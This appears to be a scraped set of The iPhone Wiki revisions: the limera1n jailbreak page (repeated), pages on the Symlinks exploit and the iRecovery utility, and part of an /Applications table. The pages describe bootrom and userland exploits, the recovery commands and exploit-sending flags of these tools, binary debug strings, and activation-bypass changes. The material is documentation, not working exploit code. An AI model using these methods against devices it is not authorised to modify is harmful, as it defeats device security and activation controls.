limera1n has been demonstrated multiple times by [[User:Geohot|geohot]], using blog posts on his now private blog. [[User:Geohot|Geohot]] showed off a high-res picture of [http://1.bp.blogspot.com/_NJ4JFBfr1tY/TDgkAsTQEmI/AAAAAAAAAcw/ZNHDxMNNL4Y/s1600/iphone4.png Cydia on an iPhone 4]. He displayed an [http://www.youtube.com/watch?v=__TR86PLiHw iPod touch 3G with an untethered jailbreak] that met [[User:MuscleNerd|MuscleNerd]]'s requirements for a good video. In addition, he took a picture of [http://4.bp.blogspot.com/_NJ4JFBfr1tY/S7_OvGMqJMI/AAAAAAAAAcE/R5WLrCizGw0/s1600/ipad_jb.jpg Cydia and blackra1n icons on an iPad].<br />
<br />
* '''Release Date:''' [[Timeline#October|October 9, 2010]]<br />
* '''Supported OS's:''' Mac OS X, Windows<br />
* '''Supported Operations:''' [[hacktivation]], [[jailbreak]]ing<br />
* '''Supported iOS: 3.2.2-4.1<br />
<br />
<br />
== Release text ==<br />
<div style="text-align: center">limera1n, 6 months in the making<br /><br />
iPhone 3GS, iPod Touch 3G, iPad, iPhone 4, iPod Touch 4G<br /><br />
4.0-4.1 and beyond+++<br /><br />
limera1n is unpatchable<br /><br />
untethered thanks to jailbreakme star '''comex'''<br /><br />
brought to you by '''geohot'''<br /><br />
hacktivates<br /><br />
Mac coming in 7 years<br /><br />
donations keep support alive<br /><br />
zero pictures of my face</div><br />
<br />
== Credit ==<br />
* '''[[User:Geohot|geohot]]''' - The program itself, and the bootrom exploit.<br />
* '''[[User:Comex|comex]]''' - The userland exploit that allows limera1n to run [[untethered jailbreak|untethered]].<br />
<br />
== Changelog ==<br />
{| class="wikitable"<br />
|-<br />
| <div style="text-align: center">'''Version'''</div><br />
| <div style="text-align: center">'''Release time'''</div><br />
| <div style="text-align: center">'''MD5 Hash'''</div><br />
| <div style="text-align: center">'''Change comment'''</div><br />
|-<br />
| BETA 1<br />
| 9 Oct 2010 XX:XX GMT<br />
| 2f2b09a6ed5c5613d5361d8a9d0696b6<br />
| First release.<br />
|-<br />
| BETA 2<br />
| 10 Oct 2010 XX:XX GMT<br />
| a70dccb3dfc0e505687424184dc3d1ce<br />
| Fixed kernel patching magic. Rerun BETA2+ over BETA1.<br />
|-<br />
| BETA 3<br />
| 10 Oct 2010 XX:XX GMT<br />
| 81730090f7de1576268ee8c2407c3d35<br />
| Fixed an issue with [[N88ap|iPhone 3GS]] ([[Bootrom 359.3.2|new bootrom]])<br />
|-<br />
| BETA 4<br />
| 10 Oct 2010 XX:XX GMT<br />
| d901c4b3a544983f095b0d03eb94e4db<br />
| Uninstall fixed, respring fixed<br />
|-<br />
| RC1<br />
| 11 Oct 2010 XX:XX GMT<br />
| 0622d99ffe4c25f75c720a689853845f<br />
| out of beta! afc2, reliability improvements, no reboot for cydia, 2kb smaller<br />
|-<br />
| RC1b<br />
| 11 Oct 2010 XX:XX GMT<br />
| fc6f7d696a57c3baede49bdff8a7f43f<br />
| addresses an install issue, mainly with iPads<br />
|-<br />
| Final<br />
| 11 Oct 2010 23:XX GMT<br />
| fc6f7d696a57c3baede49bdff8a7f43f<br />
| (same as RC1b)<br />
|}<br />
<br />
== Technical Information ==<br />
=== Basics ===<br />
* limera1n has nothing to do with [[SHA-1 Image Segment Overflow|SHAtter]] at all.<br />
* limera1n uses a [[bootrom]] exploit to achieve the [[tethered jailbreak]] and unsigned code execution.<br />
* limera1n uses a [[userland]] exploit to make it [[untethered]], which was developed by [[User:Comex|comex]].<br />
* limera1n uses a hacktivation dylib to perform [[hacktivation]].<br />
<br />
=== Exploits ===<br />
limera1n reuses the [[Usb_control_msg(0x21,_2)_Exploit|usb_control_msg(0x21,2)]] but exploits a different vulnerability (see [[Limera1n Exploit]]).<br />
<br />
=== Process ===<br />
The jailbreak appears to execute something like the following (in no particular order):<br />
* In recovery1,<br />
"setenv debug-uarts 1<br />
setenv auto-boot false<br />
saveenv"<br />
* In [[DFU Mode]], it uploads a [[payload]].<br />
* In recovery2, it uploads another [[payload]] and its [[ramdisk]].<br />
"setenv auto-boot true<br />
reset<br />
geohot done"<br />
<br />
=== Interesting Messages ===<br />
"geohot black is the new purple"<br />
<br />
"blackra1n start: %d current IRQ mask is %8.8X<br />
usb irq disabled...shhh<br />
fxns found @ %8.8X %8.8X<br />
found iBoot @ %8.8X<br />
i'm back from IRQland...<br />
3g detected, kicking nor<br />
nor kicked<br />
memcpy done<br />
iBoot restored!!!<br />
found command table @ %8.8X<br />
cmd_geohot added<br />
time to pray...%8.8X"<br />
<br />
"2.2X send command(%d): %s<br />
send exploit!!!<br />
sent data to copy: %X<br />
sent shellcode: %X has real length %X<br />
never freed: %X<br />
sent fake data to timeout: %X<br />
sent exploit to heap overflow: %X<br />
sending file with length: 0x%X Mingw runtime failure:<br />
VirtualQuery failed for %d bytes at address %p Unknown pseudo relocation protocol version %d.<br />
Unknown pseudo relocation bit size %d."<br />
<br />
== Controversy ==<br />
The release of this jailbreak was specifically designed to pressure the [[Chronic Dev (team)|Chronic Dev Team]] into not releasing [[SHA-1 Image Segment Overflow|SHAtter]], and instead implement the limera1n exploit into [[Greenpois0n (jailbreak)|greenpois0n]]; after releasing limera1n, releasing [[SHA-1 Image Segment Overflow|SHAtter]] would uselessly disclose another bootrom exploit to Apple.<br />
<br />
[[User:Geohot|Geohot]]'s rationale was that Apple already discovered, through internal testing, the limera1n exploit, making it very likely that it will be fixed in the next bootrom revision. Because [[iBoot]] code is present both in the bootrom and firmware, and because firmware is refreshed much more often than bootrom code, any fix in this code branch would appear first in firmware. [[User:Geohot|Geohot]] observed his limera1n exploit was closed in firmware and concluded that it would almost certainly be fixed in the next bootrom revision, whereas [[SHA-1 Image Segment Overflow|SHAtter]] still has a chance of remaining useful for an indefinite amount of time. Both vulnerabilities ended up being patched in the [[iPad 2]]. It was fixed before the release of limera1n according to the build number. This has been confirmed by [[User:posixninja|p0sixninja]].<br />
<br />
limera1n's [[Untethered jailbreak|untethered]] userland exploit for iOS 4.0 and 4.1 was obtained by [[User:Geohot|geohot]] under questionable circumstances from [[User:Comex|comex]]. [[User:Comex|Comex]] did end up fixing the kernel patching code by beta2, so as to not break users' devices.<br />
<br />
== Hacktivation ==<br />
limera1n will copy hacktivation.dylib to [[:/usr/lib]] and change entries to com.apple.mobile.lockdown.plist, whether it has been activated using iTunes or not. This, while helpful to many, can also be harmful to legitimate activators. For a guide on how to remove this hacktivation on iTunes activated devices, see the link below.<br />
<br />
== External Links ==<br />
* [http://limera1n.com/ Official domain] <br />
* [http://theiphonewiki.com/limera1n The iPhone Wiki Mirror]<br />
* [http://www.mediafire.com/?5sovoo41rbcdspw Limera1n RC Beta2 Dump on Mediafire provided by iH8sn0w.]<br />
* [http://www.pastie.org/1210054 Veeence's explanation for release]<br />
* [http://www.hackint0sh.org/blackra1n-3g-s-jailbreak-220/how-removing-blackra1n-limera1n-hacktivation-130992.htm Hacktivation removal guide.]<br />
<br />
[[Category:Hacking Software]]<br />
[[Category:Jailbreaks]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Symlinks&diff=41557
Symlinks
2014-07-09T14:42:54Z
<p>Ryandolan123: Changed LibTiff to LibTiff exploit since that's where the page is and it actually makes sense</p>
<hr />
<div>== Credit ==<br />
[[iPhone Dev Team]]<br />
<br />
== Exploit ==<br />
Before the discovery of the [[LibTiff Exploit]], this was used on 1.1.1 to jailbreak iPhones from 1.0.2. However, this only worked for [[iPhone]]s, as the new [[iPod touch]] could not run 1.0.2 and therefore could not use this jailbreak method. The symlink method involved symlinking [[/private/var/root/Media]], the "jailed" directory that could be accessed via iPHUC, to [[/]], and then downloading, jailbreaking, and reuploading the entire system partition from <code>/dev/rdisk0s1</code>.<br />
<br />
This exploit was fixed in 1.1.2, when Apple introduced a check in the update ramdisk that prevented this from happening. Note that this is not the 1.1.2 [[mknod]] exploit. <br />
<br />
[[Category:Jailbreaks]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=IRecovery&diff=41556
IRecovery
2014-07-09T14:30:20Z
<p>Ryandolan123: Fixed typo</p>
<hr />
<div>{{DISPLAYTITLE:iRecovery}}<br />
iRecovery is a libusb-based CLI utility for Mac OS X, Linux, and Windows. It is able to talk to [[iBoot (Bootloader)|iBoot]] and [[iBSS]] via USB. It's completely open source; the source code is released under the terms of the GNU GPL v3. The full license text can be found in the LICENSE file on github.<br />
<br />
It currently connects to:<br />
* [[DFU 0x1227|0x1227]] ([[DFU Mode]]/[[WTF]] Mode 2.0)<br />
* [[Recovery Mode (Protocols)#Recovery_Mode_2.x_.28DevID.3D0x1281.29|Recovery Mode 0x1281]] (Recovery Mode/iBSS)<br />
<br />
==Credits==<br />
westbaer<br />
<br />
==Thanks==<br />
[[User:Pod2g|pod2g]], [[tom3q]], [[User:Planetbeing|planetbeing]], [[User:Geohot|geohot]] and [[User:posixninja|posixninja]].<br />
<br />
==Features==<br />
<br />
===DFU 2.0 (0x1227)===<br />
It can upload a file, such as an [[iBSS]], so that you can unplug and spawn a shell with 0x1281.<br />
<br />
===Recovery 2.0 (0x1281)===<br />
====File Uploading====<br />
You can upload a file to 0x9000000 with the following syntax:<br />
./iRecovery -f file<br />
In newer builds that use libusb-1.0 this is now<br />
./iRecovery -u file<br />
<br />
====Two-Way Shell====<br />
You can spawn a shell to do all sorts of neat things with the syntax:<br />
./iRecovery -s<br />
Once it has spawned, you can type 'help' and iBoot will respond with its built-in command list.<br />
<br />
====Single Command====<br />
./iRecovery -c "command"<br />
Sends a single command to the device *without* spawning a shell.<br />
<br />
====usb_control_msg(0x21, 2) Exploit Command====<br />
./iRecovery -k <br />
Sends Chronic Dev's + Geohot's latest usb exploit. Implemented into blackra1n.<br />
This was updated near October 17, 2009. [http://github.com/posixninja/irecovery posixninja's fork]<br />
In newer builds this is now -e<br />
<br />
====Auto Boot====<br />
You can now enable auto-boot by running:<br />
./iRecovery -a<br />
or by sending /auto-boot in a shell.<br />
<br />
====USB Reset====<br />
Reset USB<br />
./iRecovery -r<br />
<br />
====Batch Scripting====<br />
iRecovery now supports batch scripting, this allows you to send commands to iBoot from a pre written list of commands, this also supports scripting such as /auto-boot and /upload <file><br />
./iRecovery -b <file><br />
or in a shell:<br />
/batch <file><br />
<br />
====Raw Commands====<br />
You can now send raw commands via the -x21 -x40 or -xA1 flags<br />
<br />
==Example Output==<br />
<br />
iRecovery -s<br />
======================================<br />
::<br />
:: iBSS for n82ap, Copyright 2009, Apple Inc.<br />
::<br />
:: BUILD_TAG: iBoot-596.24<br />
::<br />
:: BUILD_STYLE: RELEASE<br />
::<br />
:: USB_SERIAL_NUMBER: CPID:8900 CPRV:30 CPFM:03 SCEP:05 BDID:04 ECID:000003293C113D76 IBFL:00<br />
::<br />
=======================================<br />
<br />
Entering recovery mode, starting command prompt<br />
] printenv<br />
build-style = "RELEASE"<br />
build-version = "iBoot-596.24"<br />
config_board = "n82ap"<br />
loadaddr = "0x9000000"<br />
boot-command = "fsboot"<br />
bootdelay = "0"<br />
auto-boot = "true"<br />
idle-off = "true"<br />
boot-device = "nand0"<br />
boot-partition = "0"<br />
boot-path = "/System/Library/Caches/com.apple.kernelcaches/kernelcache.s5l8900x"<br />
display-color-space = "RGB888"<br />
display-timing = "optC"<br />
framebuffer = "0xfd00000"<br />
secure-boot = "0x1"<br />
<br />
== Supported Raw Commands ==<br />
<br />
Currently Supported by All Firmware:<br><br />
Reboot - Reboots Iphone<br />
<br />
More IBoot Commands Information:<br><br />
http://code.google.com/p/chronicdev/wiki/iBootCommands<br />
<br />
NOTE: 'bgcolor' appears to be no longer supported -- requires confirmation.<br />
<br />
==Forks==<br />
[http://github.com/iH8sn0w/irecovery iH8sn0w/irecovery]<br />
<br />
[http://github.com/GreySyntax/irecovery GreySyntax/irecovery]<br />
<br />
==Updates==<br />
* A C++ port is also in the works dubbed iRecovery++ (by [[User:GreySyntax|GreySyntax]]) can be found at [http://github.com/NSPwn/iRecoveryplusplus GitHub/NSPwn/iRecoveryplusplus]<br />
* [https://www.openjailbreak.org/projects/libirecovery-2-0/repository libiRecovery 2.0 in development by OpenJailBreak.org]<br />
* A VB.NET GUI port for Windows has been made under the name [[GiRecovery|Zeratul]].<br />
<br />
==Download==<br />
*[https://github.com/Chronic-Dev/libirecovery Chronic-Dev - libiRecovery (Mac OS X | Linux | Windows)]<br />
*[https://github.com/GreySyntax/iRecoveryplusplus GreySyntax - iRecovery++ (Mac OS X| Linux | Windows (Possibly))]<br />
<br />
<br />
Note: Source only.<br />
<br />
[[Category:Hacking Software]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Limera1n&diff=41555
Limera1n
2014-07-09T14:08:34Z
<p>Ryandolan123: </p>
<hr />
<div>{{lowercase}}<br />
[[Image:Ra1ndrop.png|right]]<br />
''' limera1n''' is [[User:Geohot|geohot]]'s [[jailbreak]] utility. It uses a previously undisclosed bootrom exploit and [[User:Comex|comex]]'s [[Packet Filter Kernel Exploit]] to achieve an [[untethered jailbreak]] on many devices. The following devices are supported:<br />
* [[n88ap|iPhone 3GS]]<br />
* [[n90ap|iPhone 4 (iPhone3,1)]]<br />
* [[n18ap|iPod touch 3G]]<br />
* [[n81ap|iPod touch 4G]]<br />
* [[k48ap|iPad 1G]]<br />
* [[k66ap|Apple TV 2G]] (creates a bare-bones jailbreak by mounting '/' as read/write in /etc/fstab)<br />
limera1n has been demonstrated multiple times by [[User:Geohot|geohot]], using blog posts on his now private blog. [[User:Geohot|Geohot]] showed off a high-res picture of [http://1.bp.blogspot.com/_NJ4JFBfr1tY/TDgkAsTQEmI/AAAAAAAAAcw/ZNHDxMNNL4Y/s1600/iphone4.png Cydia on an iPhone 4]. He displayed an [http://www.youtube.com/watch?v=__TR86PLiHw iPod touch 3G with an untethered jailbreak] that met [[User:MuscleNerd|MuscleNerd]]'s requirements for a good video. In addition, he took a picture of [http://4.bp.blogspot.com/_NJ4JFBfr1tY/S7_OvGMqJMI/AAAAAAAAAcE/R5WLrCizGw0/s1600/ipad_jb.jpg Cydia and blackra1n icons on an iPad].<br />
<br />
* '''Release Date:''' [[Timeline#October|October 9, 2010]]<br />
* '''Supported OS's:''' Mac OS X, Windows<br />
* '''Supported Operations:''' [[hacktivation]], [[jailbreak]]ing<br />
* '''Supported iOS: 3.2.2-4.1<br />
<br />
<br />
== Release text ==<br />
<div style="text-align: center">limera1n, 6 months in the making<br /><br />
iPhone 3GS, iPod Touch 3G, iPad, iPhone 4, iPod Touch 4G<br /><br />
4.0-4.1 and beyond+++<br /><br />
limera1n is unpatchable<br /><br />
untethered thanks to jailbreakme star '''comex'''<br /><br />
brought to you by '''geohot'''<br /><br />
hacktivates<br /><br />
Mac coming in 7 years<br /><br />
donations keep support alive<br /><br />
zero pictures of my face</div><br />
<br />
== Credit ==<br />
* '''[[User:Geohot|geohot]]''' - The program itself, and the bootrom exploit.<br />
* '''[[User:Comex|comex]]''' - The userland exploit that allows limera1n to run [[untethered jailbreak|untethered]].<br />
<br />
== Changelog ==<br />
{| class="wikitable"<br />
|-<br />
| <div style="text-align: center">'''Version'''</div><br />
| <div style="text-align: center">'''Release time'''</div><br />
| <div style="text-align: center">'''MD5 Hash'''</div><br />
| <div style="text-align: center">'''Change comment'''</div><br />
|-<br />
| BETA 1<br />
| 9 Oct 2010 XX:XX GMT<br />
| 2f2b09a6ed5c5613d5361d8a9d0696b6<br />
| First release.<br />
|-<br />
| BETA 2<br />
| 10 Oct 2010 XX:XX GMT<br />
| a70dccb3dfc0e505687424184dc3d1ce<br />
| Fixed kernel patching magic. Rerun BETA2+ over BETA1.<br />
|-<br />
| BETA 3<br />
| 10 Oct 2010 XX:XX GMT<br />
| 81730090f7de1576268ee8c2407c3d35<br />
| Fixed an issue with [[N88ap|iPhone 3GS]] ([[Bootrom 359.3.2|new bootrom]])<br />
|-<br />
| BETA 4<br />
| 10 Oct 2010 XX:XX GMT<br />
| d901c4b3a544983f095b0d03eb94e4db<br />
| Uninstall fixed, respring fixed<br />
|-<br />
| RC1<br />
| 11 Oct 2010 XX:XX GMT<br />
| 0622d99ffe4c25f75c720a689853845f<br />
| out of beta! afc2, reliability improvements, no reboot for cydia, 2kb smaller<br />
|-<br />
| RC1b<br />
| 11 Oct 2010 XX:XX GMT<br />
| fc6f7d696a57c3baede49bdff8a7f43f<br />
| addresses an install issue, mainly with iPads<br />
|-<br />
| Final<br />
| 11 Oct 2010 23:XX GMT<br />
| fc6f7d696a57c3baede49bdff8a7f43f<br />
| (same as RC1b)<br />
|}<br />
<br />
== Technical Information ==<br />
=== Basics ===<br />
* limera1n has nothing to do with [[SHA-1 Image Segment Overflow|SHAtter]] at all.<br />
* limera1n uses a [[bootrom]] exploit to achieve the [[tethered jailbreak]] and unsigned code execution.<br />
* limera1n uses a [[userland]] exploit to make it [[untethered]], which was developed by [[User:Comex|comex]].<br />
* limera1n uses a hacktivation dylib to perform [[hacktivation]].<br />
<br />
=== Exploits ===<br />
limera1n reuses the [[Usb_control_msg(0x21,_2)_Exploit|usb_control_msg(0x21,2)]] but exploits a different vulnerability (see [[Limera1n Exploit]]).<br />
<br />
=== Process ===<br />
The jailbreak appears to execute something like the following (in no particular order):<br />
* In recovery1,<br />
"setenv debug-uarts 1<br />
setenv auto-boot false<br />
saveenv"<br />
* In [[DFU Mode]], it uploads a [[payload]].<br />
* In recovery2, it uploads another [[payload]] and its [[ramdisk]].<br />
"setenv auto-boot true<br />
reset<br />
geohot done"<br />
<br />
=== Interesting Messages ===<br />
"geohot black is the new purple"<br />
<br />
"blackra1n start: %d current IRQ mask is %8.8X<br />
usb irq disabled...shhh<br />
fxns found @ %8.8X %8.8X<br />
found iBoot @ %8.8X<br />
i'm back from IRQland...<br />
3g detected, kicking nor<br />
nor kicked<br />
memcpy done<br />
iBoot restored!!!<br />
found command table @ %8.8X<br />
cmd_geohot added<br />
time to pray...%8.8X"<br />
<br />
"2.2X send command(%d): %s<br />
send exploit!!!<br />
sent data to copy: %X<br />
sent shellcode: %X has real length %X<br />
never freed: %X<br />
sent fake data to timeout: %X<br />
sent exploit to heap overflow: %X<br />
sending file with length: 0x%X Mingw runtime failure:<br />
VirtualQuery failed for %d bytes at address %p Unknown pseudo relocation protocol version %d.<br />
Unknown pseudo relocation bit size %d."<br />
<br />
== Controversy ==<br />
The release of this jailbreak was specifically designed to pressure the [[Chronic Dev (team)|Chronic Dev Team]] into not releasing [[SHA-1 Image Segment Overflow|SHAtter]], and instead implement the limera1n exploit into [[Greenpois0n (jailbreak)|greenpois0n]]; after releasing limera1n, releasing [[SHA-1 Image Segment Overflow|SHAtter]] would uselessly disclose another bootrom exploit to Apple.<br />
<br />
[[User:Geohot|Geohot]]'s rationale was that Apple already discovered, through internal testing, the limera1n exploit, making it very likely that it will be fixed in the next bootrom revision. Because [[iBoot]] code is present both in the bootrom and firmware, and because firmware is refreshed much more often than bootrom code, any fix in this code branch would appear first in firmware. [[User:Geohot|Geohot]] observed his limera1n exploit was closed in firmware and concluded that it would almost certainly be fixed in the next bootrom revision, whereas [[SHA-1 Image Segment Overflow|SHAtter]] still has a chance of remaining useful for an indefinite amount of time. Both vulnerabilities ended up being patched in the [[iPad 2]]. It was fixed before the release of limera1n according to the build number. This has been confirmed by [[User:posixninja|p0sixninja]].<br />
<br />
limera1n's [[Untethered jailbreak|untethered]] userland exploit for iOS 4.0 and 4.1 was obtained by [[User:Geohot|geohot]] under questionable circumstances from [[User:Comex|comex]]. [[User:Comex|Comex]] did end up fixing the kernel patching code by beta2, so as to not break users' devices.<br />
<br />
== Hacktivation ==<br />
limera1n will copy hacktivation.dylib to [[:/usr/lib]] and change entries to com.apple.mobile.lockdown.plist, whether it has been activated using iTunes or not. This, while helpful to many, can also be harmful to legitimate activators. For a guide on how to remove this hacktivation on iTunes activated devices, see the link below.<br />
<br />
== External Links ==<br />
* [http://limera1n.com/ Official domain] <br />
* [http://theiphonewiki.com/limera1n The iPhone Wiki Mirror]<br />
* [http://www.mediafire.com/?5sovoo41rbcdspw Limera1n RC Beta2 Dump on Mediafire provided by iH8sn0w.]<br />
* [http://www.pastie.org/1210054 Veeence's explanation for release]<br />
* [http://www.hackint0sh.org/blackra1n-3g-s-jailbreak-220/how-removing-blackra1n-limera1n-hacktivation-130992.htm Hacktivation removal guide.]<br />
<br />
[[Category:Hacking Software]]<br />
[[Category:Jailbreaks]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Limera1n&diff=41554
Limera1n
2014-07-09T13:54:00Z
<p>Ryandolan123: </p>
<hr />
<div>{{lowercase}}<br />
[[Image:Ra1ndrop.png|right]]<br />
''' limera1n''' is [[User:Geohot|geohot]]'s [[jailbreak]] utility. It uses a previously undisclosed bootrom exploit and [[User:Comex|comex]]'s [[Packet Filter Kernel Exploit]] to achieve an [[untethered jailbreak]] on newer devices. The following devices are supported:<br />
* [[n88ap|iPhone 3GS]]<br />
* [[n90ap|iPhone 4 (iPhone3,1)]]<br />
* [[n18ap|iPod touch 3G]]<br />
* [[n81ap|iPod touch 4G]]<br />
* [[k48ap|iPad 1G]]<br />
* [[k66ap|Apple TV 2G]] (creates a bare-bones jailbreak by mounting '/' as read/write in /etc/fstab)<br />
limera1n has been demonstrated multiple times by [[User:Geohot|geohot]], using blog posts on his now private blog. [[User:Geohot|Geohot]] showed off a high-res picture of [http://1.bp.blogspot.com/_NJ4JFBfr1tY/TDgkAsTQEmI/AAAAAAAAAcw/ZNHDxMNNL4Y/s1600/iphone4.png Cydia on an iPhone 4]. He displayed an [http://www.youtube.com/watch?v=__TR86PLiHw iPod touch 3G with an untethered jailbreak] that met [[User:MuscleNerd|MuscleNerd]]'s requirements for a good video. In addition, he took a picture of [http://4.bp.blogspot.com/_NJ4JFBfr1tY/S7_OvGMqJMI/AAAAAAAAAcE/R5WLrCizGw0/s1600/ipad_jb.jpg Cydia and blackra1n icons on an iPad].<br />
<br />
* '''Release Date:''' [[Timeline#October|October 9, 2010]]<br />
* '''Supported OS's:''' Mac OS X, Windows<br />
* '''Supported Operations:''' [[hacktivation]], [[jailbreak]]ing<br />
* '''Supported iOS: 3.2.2-4.1<br />
<br />
<br />
== Release text ==<br />
<div style="text-align: center">limera1n, 6 months in the making<br /><br />
iPhone 3GS, iPod Touch 3G, iPad, iPhone 4, iPod Touch 4G<br /><br />
4.0-4.1 and beyond+++<br /><br />
limera1n is unpatchable<br /><br />
untethered thanks to jailbreakme star '''comex'''<br /><br />
brought to you by '''geohot'''<br /><br />
hacktivates<br /><br />
Mac coming in 7 years<br /><br />
donations keep support alive<br /><br />
zero pictures of my face</div><br />
<br />
== Credit ==<br />
* '''[[User:Geohot|geohot]]''' - The program itself, and the bootrom exploit.<br />
* '''[[User:Comex|comex]]''' - The userland exploit that allows limera1n to run [[untethered jailbreak|untethered]].<br />
<br />
== Changelog ==<br />
{| class="wikitable"<br />
|-<br />
| <div style="text-align: center">'''Version'''</div><br />
| <div style="text-align: center">'''Release time'''</div><br />
| <div style="text-align: center">'''MD5 Hash'''</div><br />
| <div style="text-align: center">'''Change comment'''</div><br />
|-<br />
| BETA 1<br />
| 9 Oct 2010 XX:XX GMT<br />
| 2f2b09a6ed5c5613d5361d8a9d0696b6<br />
| First release.<br />
|-<br />
| BETA 2<br />
| 10 Oct 2010 XX:XX GMT<br />
| a70dccb3dfc0e505687424184dc3d1ce<br />
| Fixed kernel patching magic. Rerun BETA2+ over BETA1.<br />
|-<br />
| BETA 3<br />
| 10 Oct 2010 XX:XX GMT<br />
| 81730090f7de1576268ee8c2407c3d35<br />
| Fixed an issue with [[N88ap|iPhone 3GS]] ([[Bootrom 359.3.2|new bootrom]])<br />
|-<br />
| BETA 4<br />
| 10 Oct 2010 XX:XX GMT<br />
| d901c4b3a544983f095b0d03eb94e4db<br />
| Uninstall fixed, respring fixed<br />
|-<br />
| RC1<br />
| 11 Oct 2010 XX:XX GMT<br />
| 0622d99ffe4c25f75c720a689853845f<br />
| out of beta! afc2, reliability improvements, no reboot for cydia, 2kb smaller<br />
|-<br />
| RC1b<br />
| 11 Oct 2010 XX:XX GMT<br />
| fc6f7d696a57c3baede49bdff8a7f43f<br />
| addresses an install issue, mainly with iPads<br />
|-<br />
| Final<br />
| 11 Oct 2010 23:XX GMT<br />
| fc6f7d696a57c3baede49bdff8a7f43f<br />
| (same as RC1b)<br />
|}<br />
<br />
== Technical Information ==<br />
=== Basics ===<br />
* limera1n has nothing to do with [[SHA-1 Image Segment Overflow|SHAtter]] at all.<br />
* limera1n uses a [[bootrom]] exploit to achieve the [[tethered jailbreak]] and unsigned code execution.<br />
* limera1n uses a [[userland]] exploit to make it [[untethered]], which was developed by [[User:Comex|comex]].<br />
* limera1n uses a hacktivation dylib to perform [[hacktivation]].<br />
<br />
=== Exploits ===<br />
limera1n reuses the [[Usb_control_msg(0x21,_2)_Exploit|usb_control_msg(0x21,2)]] but exploits a different vulnerability (see [[Limera1n Exploit]]).<br />
<br />
=== Process ===<br />
The jailbreak appears to execute something like the following (in no particular order):<br />
* In recovery1,<br />
"setenv debug-uarts 1<br />
setenv auto-boot false<br />
saveenv"<br />
* In [[DFU Mode]], it uploads a [[payload]].<br />
* In recovery2, it uploads another [[payload]] and its [[ramdisk]].<br />
"setenv auto-boot true<br />
reset<br />
geohot done"<br />
<br />
=== Interesting Messages ===<br />
"geohot black is the new purple"<br />
<br />
"blackra1n start: %d current IRQ mask is %8.8X<br />
usb irq disabled...shhh<br />
fxns found @ %8.8X %8.8X<br />
found iBoot @ %8.8X<br />
i'm back from IRQland...<br />
3g detected, kicking nor<br />
nor kicked<br />
memcpy done<br />
iBoot restored!!!<br />
found command table @ %8.8X<br />
cmd_geohot added<br />
time to pray...%8.8X"<br />
<br />
"2.2X send command(%d): %s<br />
send exploit!!!<br />
sent data to copy: %X<br />
sent shellcode: %X has real length %X<br />
never freed: %X<br />
sent fake data to timeout: %X<br />
sent exploit to heap overflow: %X<br />
sending file with length: 0x%X Mingw runtime failure:<br />
VirtualQuery failed for %d bytes at address %p Unknown pseudo relocation protocol version %d.<br />
Unknown pseudo relocation bit size %d."<br />
<br />
== Controversy ==<br />
The release of this jailbreak was specifically designed to pressure the [[Chronic Dev (team)|Chronic Dev Team]] into not releasing [[SHA-1 Image Segment Overflow|SHAtter]], and instead implement the limera1n exploit into [[Greenpois0n (jailbreak)|greenpois0n]]; after releasing limera1n, releasing [[SHA-1 Image Segment Overflow|SHAtter]] would uselessly disclose another bootrom exploit to Apple.<br />
<br />
[[User:Geohot|Geohot]]'s rationale was that Apple already discovered, through internal testing, the limera1n exploit, making it very likely that it will be fixed in the next bootrom revision. Because [[iBoot]] code is present both in the bootrom and firmware, and because firmware is refreshed much more often than bootrom code, any fix in this code branch would appear first in firmware. [[User:Geohot|Geohot]] observed his limera1n exploit was closed in firmware and concluded that it would almost certainly be fixed in the next bootrom revision, whereas [[SHA-1 Image Segment Overflow|SHAtter]] still has a chance of remaining useful for an indefinite amount of time. Both vulnerabilities ended up being patched in the [[iPad 2]]. It was fixed before the release of limera1n according to the build number. This has been confirmed by [[User:posixninja|p0sixninja]].<br />
<br />
limera1n's [[Untethered jailbreak|untethered]] userland exploit for iOS 4.0 and 4.1 was obtained by [[User:Geohot|geohot]] under questionable circumstances from [[User:Comex|comex]]. [[User:Comex|Comex]] did end up fixing the kernel patching code by beta2, so as to not break users' devices.<br />
<br />
== Hacktivation ==<br />
limera1n will copy hacktivation.dylib to [[:/usr/lib]] and change entries to com.apple.mobile.lockdown.plist, whether it has been activated using iTunes or not. This, while helpful to many, can also be harmful to legitimate activators. For a guide on how to remove this hacktivation on iTunes activated devices, see the link below.<br />
<br />
== External Links ==<br />
* [http://limera1n.com/ Official domain] <br />
* [http://theiphonewiki.com/limera1n The iPhone Wiki Mirror]<br />
* [http://www.mediafire.com/?5sovoo41rbcdspw Limera1n RC Beta2 Dump on Mediafire provided by iH8sn0w.]<br />
* [http://www.pastie.org/1210054 Veeence's explanation for release]<br />
* [http://www.hackint0sh.org/blackra1n-3g-s-jailbreak-220/how-removing-blackra1n-limera1n-hacktivation-130992.htm Hacktivation removal guide.]<br />
<br />
[[Category:Hacking Software]]<br />
[[Category:Jailbreaks]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=/Applications&diff=41346
/Applications
2014-06-19T19:12:19Z
<p>Ryandolan123: </p>
<hr />
<div>== Summary ==<br />
This is where all of the pre-installed native apps, as well as native jailbreak apps (from Cydia and elsewhere), are installed. They can't be deleted under normal circumstances. One can delete them on a jailbroken device through some sort of file-management tool such as SSH or iFile, although doing this is highly unrecommended as they can't be re-installed.<br />
<br />
New user apps are installed via iTunes or the App Store in the [[/private/var/mobile/Applications]] folder.<br />
<br />
== Children ==<br />
=== Folders ===<br />
*{{ipfw|Utilities}} <br />
==== Native Apps ====<br />
{| class="wikitable sortable" style="table-layout: fixed; border-collapse: collapse;" border="1"<br />
|-<br />
! Folder name (generic)<br />
! Folder name ([[iPad]] version)<br />
! Folder name ([[Apple TV]] version)<br />
! Application name<br />
! 1.x<br />
! 2.x<br />
! 3.x<br />
! 4.x <br />
! 5.x<br />
! 6.x<br />
! 7.x<br />
! 8.x (beta)<br />
! Description<br />
|-<br />
| {{ipfw|AACredentialRecoveryDialog.app}}<br />
| ?<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| ?<br />
|-<br />
| {{ipfw|AdSheet.app}} (iAd.app in iOS 8)<br />
| {{ipfw|AdSheet~ipad.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
